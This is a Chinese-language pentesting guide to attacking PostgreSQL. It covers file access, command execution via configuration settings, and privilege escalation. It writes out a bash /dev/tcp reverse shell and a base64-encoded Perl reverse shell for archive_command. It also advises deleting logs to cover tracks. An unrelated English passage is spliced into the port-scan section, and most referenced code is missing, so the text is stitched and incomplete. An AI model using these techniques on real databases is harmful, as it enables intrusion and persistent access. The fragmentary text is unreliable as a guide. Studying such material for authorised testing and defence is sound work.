5432,5433 - Pentesting Postgresql

使用 Trickest 可轻松构建并通过世界上最先进的社区工具自动化工作流程。 立即获取访问权限:
基本信息
PostgreSQL 被描述为一种面向对象的关系型数据库系统,是开源的。该系统不仅使用 SQL 语言,还通过附加功能增强了它。其功能使其能够处理各种数据类型和操作,使其成为开发人员和组织的多功能选择。
**默认端口:**5432,如果此端口已被使用,似乎 postgresql 将使用下一个未使用的端口(可能是 5433)。
连接和基本枚举
如果运行 \list 命令发现一个名为 rdsadmin 的数据库,那么你就知道你在一个 AWS postgresql数据库 内。
要了解更多关于如何滥用PostgreSQL数据库的信息,请查看:
PostgreSQL injection自动枚举
端口扫描
根据这项研究,当连接尝试失败时,dblink会抛出一个sqlclient_unable_to_establish_sqlconnection异常,其中包括错误的解释。以下是这些细节的示例。
主机已宕机
DETAIL: 无法连接到服务器: 主机不可达 服务器是否在主机"1.2.3.4"上运行,并接受端口5678上的TCP/IP连接?
端口已关闭
端口是开放的
Manual Connection: Use
psqlto manually connect to the PostgreSQL service and gather information about the databases and users.
Exploitation
Default Credentials: Check for default credentials like
postgres:postgresor weak credentials in use.SQL Injection: Exploit SQL injection vulnerabilities in web applications connected to the PostgreSQL database.
Privilege Escalation: Look for ways to escalate privileges within the PostgreSQL service or the underlying operating system.
Post-Exploitation
Dumping Data: Use tools like
pg_dumpto dump the contents of databases for further analysis.Creating Backdoors: Create backdoors for persistent access to the PostgreSQL service.
Covering Tracks: Remove evidence of the attack by deleting logs and other traces of unauthorized access.
Countermeasures
Strong Credentials: Always use strong, unique passwords for PostgreSQL accounts.
Regular Updates: Keep the PostgreSQL server updated with the latest security patches to prevent exploitation of known vulnerabilities.
Network Segmentation: Implement network segmentation to restrict access to the PostgreSQL service from unauthorized users.
DETAIL: FATAL: password authentication failed for user "name"
DETAIL: could not connect to server: Connection timed out Is the server running on host "1.2.3.4" and accepting TCP/IP connections on port 5678?
表格
函数
文件系统操作
读取目录和文件
从这个提交中,定义的**DEFAULT_ROLE_READ_SERVER_FILES组成员(称为pg_read_server_files)和超级用户可以在任何路径上使用COPY**方法(查看genfile.c中的convert_and_check_filename):
请记住,如果您不是超级用户但具有CREATEROLE权限,则可以将自己添加到该组中:
有其他PostgreSQL函数可用于读取文件或列出目录。只有超级用户和具有显式权限的用户可以使用它们:
您可以在https://www.postgresql.org/docs/current/functions-admin.html找到更多函数
简单文件写入
只有超级用户和**pg_write_server_files**成员才能使用copy来写入文件。
请记住,如果您不是超级用户但具有**CREATEROLE权限,则可以将自己添加到该组中:**
请记住,COPY 无法处理换行符,因此即使您使用 base64 负载,您也需要发送一行命令。
这种技术的一个非常重要的限制是**copy 无法用于编写二进制文件,因为它会修改一些二进制值。**
上传二进制文件
然而,还有其他技术可以上传大型二进制文件:
Big Binary Files Upload (PostgreSQL)
漏洞赏金提示:注册 Intigriti,这是一个由黑客创建的高级漏洞赏金平台!立即加入我们,访问 https://go.intigriti.com/hacktricks,开始赚取高达**$100,000**的赏金!
通过本地文件写入更新 PostgreSQL 表数据
如果您有必要的权限来读写 PostgreSQL 服务器文件,您可以通过覆盖关联文件节点在PostgreSQL 数据目录上更新服务器上的任何表。有关此技术的更多信息在这里。
所需步骤:
获取 PostgreSQL 数据目录
注意: 如果无法从设置中检索当前数据目录路径,您可以通过 SELECT version() 查询查询主要的 PostgreSQL 版本,然后尝试暴力破解路径。在 Unix 安装的 PostgreSQL 上,常见的数据目录路径是 /var/lib/PostgreSQL/MAJOR_VERSION/CLUSTER_NAME/。常见的集群名称是 main。 2. 获取与目标表关联的文件节点的相对路径
此查询应返回类似 base/3/1337 的内容。磁盘上的完整路径将是 $DATA_DIRECTORY/base/3/1337,即 /var/lib/postgresql/13/main/base/3/1337。 3. 通过 lo_* 函数下载文件节点
获取与目标表关联的数据类型
使用 PostgreSQL Filenode Editor 来编辑文件节点;将所有
rol*布尔标志设置为 1 以获取完全权限。
6. 通过 lo_* 函数重新上传编辑后的文件节点,并覆盖磁盘上的原始文件
(可选) 通过运行昂贵的 SQL 查询来清除内存表缓存
您现在应该在 PostgreSQL 中看到更新后的表值。
您还可以通过编辑 pg_authid 表成为超级管理员。请参阅以下部分。
RCE
RCE 到程序
自版本 9.3起,只有超级用户和**pg_execute_server_program** 组的成员才能使用 copy 进行 RCE(例如,用于数据泄露的示例:
示例执行:
请记住,如果您不是超级用户但具有**CREATEROLE权限,则可以将自己添加到该组中:**
或者使用 metasploit 中的 multi/postgres/postgres_copy_from_program_cmd_exec 模块。
关于此漏洞的更多信息在这里。尽管被报告为 CVE-2019-9193,但Postges宣称这是一个功能,不会修复。
使用PostgreSQL语言进行RCE
RCE with PostgreSQL Languages使用PostgreSQL扩展进行RCE
一旦你从之前的帖子中学会了如何上传二进制文件,你可以尝试获取RCE上传postgresql扩展并加载它。
RCE with PostgreSQL ExtensionsPostgreSQL配置文件RCE
PostgreSQL的配置文件由postgres用户(运行数据库的用户)拥有可写权限,因此作为超级用户,您可以在文件系统中写入文件,因此可以覆盖此文件。

使用ssl_passphrase_command进行RCE
有关此技术的更多信息请点击此处。
配置文件具有一些有趣的属性,可以导致RCE:
ssl_key_file = '/etc/ssl/private/ssl-cert-snakeoil.key'数据库私钥的路径ssl_passphrase_command = ''如果私有文件受密码保护(加密),PostgreSQL将执行此属性中指定的命令。ssl_passphrase_command_supports_reload = off如果此属性为on,则在执行pg_reload_conf()时,如果密钥受密码保护,将执行命令。
然后,攻击者需要:
从服务器转储私钥
加密下载的私钥:
rsa -aes256 -in downloaded-ssl-cert-snakeoil.key -out ssl-cert-snakeoil.key覆盖
转储当前的PostgreSQL 配置
使用上述属性配置覆盖 配置:
ssl_passphrase_command = 'bash -c "bash -i >& /dev/tcp/127.0.0.1/8111 0>&1"'ssl_passphrase_command_supports_reload = on执行
pg_reload_conf()
在测试中我注意到,这只有在私钥文件具有640权限,由root拥有并且由ssl-cert或postgres组拥有(因此postgres用户可以读取它),并且放置在_/var/lib/postgresql/12/main_中时才有效。
使用archive_command进行RCE
有关此配置和WAL的更多信息请点击此处。
配置文件中的另一个可利用属性是archive_command。
为了使其工作,archive_mode设置必须为'on'或'always'。如果是这样,那么我们可以覆盖archive_command中的命令,并通过WAL(预写式日志记录)操作强制执行它。
一般步骤是:
检查归档模式是否已启用:
SELECT current_setting('archive_mode')使用有效载荷覆盖
archive_command。例如,反向shell:archive_command = 'echo "dXNlIFNvY2tldDskaT0iMTAuMC4wLjEiOyRwPTQyNDI7c29ja2V0KFMsUEZfSU5FVCxTT0NLX1NUUkVBTSxnZXRwcm90b2J5bmFtZSgidGNwIikpO2lmKGNvbm5lY3QoUyxzb2NrYWRkcl9pbigkcCxpbmV0X2F0b24oJGkpKSkpe29wZW4oU1RESU4sIj4mUyIpO29wZW4oU1RET1VULCI+JlMiKTtvcGVuKFNUREVSUiwiPiZTIik7ZXhlYygiL2Jpbi9zaCAtaSIpO307" | base64 --decode | perl'重新加载配置:
SELECT pg_reload_conf()强制运行WAL操作,这将调用归档命令:
SELECT pg_switch_wal()或对于某些Postgres版本SELECT pg_switch_xlog()
使用预加载库进行RCE
有关此技术的更多信息请点击此处。
此攻击向量利用以下配置变量:
session_preload_libraries-- PostgreSQL服务器在客户端连接时将加载的库。dynamic_library_path-- PostgreSQL服务器将搜索库的目录列表。
我们可以将dynamic_library_path值设置为postgres用户运行数据库的可写目录,例如/tmp/目录,并在那里上传一个恶意的.so对象。接下来,我们将通过将其包含在session_preload_libraries变量中,强制PostgreSQL服务器加载我们新上传的库。
攻击步骤为:
下载原始的
postgresql.conf在
dynamic_library_path值中包含/tmp/目录,例如dynamic_library_path = '/tmp:$libdir'在
session_preload_libraries值中包含恶意库名称,例如session_preload_libraries = 'payload.so'通过
SELECT version()查询检查主要的PostgreSQL版本使用正确的PostgreSQL dev包编译恶意库代码示例代码:
编译代码:
上传在步骤2-3中创建的恶意
postgresql.conf,并覆盖原始文件将步骤5中的
payload.so上传到/tmp目录通过重新启动服务器或调用
SELECT pg_reload_conf()查询重新加载服务器配置在下一个数据库连接时,您将收到反向shell连接。
Postgres提权
CREATEROLE提权
授权
根据文档: 具有**CREATEROLE权限的角色可以授予或撤销任何不是超级用户的角色**的成员资格。
因此,如果您拥有**CREATEROLE权限,您可以授予自己访问其他角色**(不是超级用户)的权限,这可以让您读取和写入文件以及执行命令:
修改密码
拥有此角色的用户还可以更改其他非超级用户的密码:
提升为超级用户
通常情况下,会发现本地用户可以在 PostgreSQL 中登录而无需提供任何密码。因此,一旦您获得了执行代码的权限,您可以滥用这些权限来获取**SUPERUSER**角色:
这通常是因为**pg_hba.conf**文件中的以下几行:
ALTER TABLE提权
在这篇文章中解释了如何在Postgres GCP中滥用授予用户的ALTER TABLE权限来进行提权。
当您尝试将另一个用户设为表的所有者时,应该会收到错误以阻止此操作,但显然GCP允许非超级用户postgres用户执行此操作:

结合这个想法,当在具有索引函数的表上执行INSERT/UPDATE/ANALYZE命令时,该函数会作为命令的一部分以表所有者的权限被调用。可以创建一个带有函数的索引,并将所有者权限授予超级用户,然后对具有恶意函数的表运行ANALYZE,该函数将能够执行命令,因为它正在使用所有者的权限。
利用
首先创建一个新表。
向表中插入一些无关内容,以提供索引函数的数据。
开发一个包含代码执行负载的恶意索引函数,允许执行未经授权的命令。
将表的所有者更改为"cloudsqladmin",这是GCP专门用于管理和维护数据库的超级用户角色。
对表执行ANALYZE操作。此操作迫使PostgreSQL引擎切换到表所有者"cloudsqladmin"的用户上下文。因此,恶意索引函数将以"cloudsqladmin"的权限调用,从而使先前未经授权的shell命令得以执行。
在PostgreSQL中,这个流程看起来像这样:
然后,shell_commands_results表将包含执行代码的输出:
本地登录
一些配置不当的PostgreSQL实例可能允许任何本地用户登录,可以使用**dblink函数**从127.0.0.1本地登录:
请注意,为了使上一个查询起作用,需要存在函数 dblink。如果不存在,您可以尝试使用以下命令创建它:
如果您拥有具有更高权限的用户密码,但该用户不允许从外部IP登录,您可以使用以下函数以该用户身份执行查询:
可以使用以下方法检查该函数是否存在:
具有 SECURITY DEFINER 的自定义定义函数
在这篇文章中,渗透测试人员能够在由IBM提供的postgres实例内提升权限,因为他们发现了带有 SECURITY DEFINER 标志的此函数:
正如文档中所解释的,具有 SECURITY DEFINER 的函数 将以 拥有它的用户的权限 执行。因此,如果函数容易受到 SQL 注入攻击,或者使用了一些由攻击者控制的参数执行特权操作,则可能被滥用以在 postgres 内提升权限。
在上述代码的第4行中,您可以看到该函数具有 SECURITY DEFINER 标志。
通过PL/pgSQL进行暴力破解
PL/pgSQL是一种功能齐全的编程语言,与SQL相比提供了更大的过程控制。它可以使用循环和其他控制结构来增强程序逻辑。此外,SQL语句和触发器可以调用使用PL/pgSQL语言创建的函数。这种集成允许更全面和多功能的数据库编程和自动化方法。 您可以滥用这种语言来要求PostgreSQL暴力破解用户凭据。
通过覆盖内部PostgreSQL表进行权限提升
如果您可以读写PostgreSQL服务器文件,您可以通过覆盖与内部pg_authid表关联的PostgreSQL磁盘文件节点,成为超级用户。
了解有关此技术的更多信息在这里。
攻击步骤如下:
获取PostgreSQL数据目录
获取与
pg_authid表关联的文件节点的相对路径通过
lo_*函数下载文件节点获取与
pg_authid表关联的数据类型使用PostgreSQL Filenode Editor来编辑文件节点; 将所有
rol*布尔标志设置为1以获取完全权限。通过
lo_*函数重新上传编辑后的文件节点,并覆盖磁盘上的原始文件_(可选)_通过运行昂贵的SQL查询来清除内存表缓存
您现在应该具有完整超级管理员权限。
POST
日志记录
在 postgresql.conf 文件中,您可以通过更改以下设置来启用postgresql日志记录:
然后,重新启动服务。
pgadmin
pgadmin 是用于 PostgreSQL 的管理和开发平台。 您可以在 pgadmin4.db 文件中找到密码。 您可以使用脚本中的 decrypt 函数对其进行解密:https://github.com/postgres/pgadmin4/blob/master/web/pgadmin/utils/crypto.py
pg_hba
PostgreSQL中的客户端身份验证通过一个名为pg_hba.conf的配置文件进行管理。该文件包含一系列记录,每个记录指定连接类型、客户端IP地址范围(如果适用)、数据库名称、用户名以及用于匹配连接的身份验证方法。与连接类型、客户端地址、请求的数据库和用户名匹配的第一条记录用于身份验证。如果身份验证失败,没有备用选项或备份。如果没有记录匹配,则拒绝访问。
在pg_hba.conf中可用的基于密码的身份验证方法有md5、crypt和password。这些方法在密码传输方式上有所不同:MD5哈希、crypt加密或明文。需要注意的是,crypt方法不能与在pg_authid中加密的密码一起使用。
最后更新于